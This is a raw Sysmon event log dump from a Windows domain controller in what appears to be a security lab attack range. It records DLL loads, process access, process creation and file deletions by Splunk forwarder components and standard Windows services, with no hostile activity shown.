Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000101062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000101061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x8000000000000000101060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000101058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000101057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000101056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x8000000000000000101055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000101050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000101049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.906{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000101048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.530{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFDEA727E49BBDA8815C5C36E37A8934,SHA256=8B25CCCA5AA1455CEF163394B55417C372B1F14C6EE070E760CF694D3FEA5A0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000101047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.077{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000101046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.077{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000101045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.077{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000101157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.909{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-129MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000101156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.782{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3D262B6E1D851573F18D0C0C6745E3,SHA256=A5770DFAB4E2B8EBAF6DA76CAD00AB32F95B9D6DCF3BAE9841712D5BB0278FBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000101155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.750{326FD73D-C1A3-6294-500B-000000005502}67325792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.750{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000101153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.735{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000101152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000101151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000101150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000101149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000101148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000101147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000101146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000101145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000101144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.594{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000101143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000101142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000101141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000101140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000101139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000101138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000101137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000101136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program 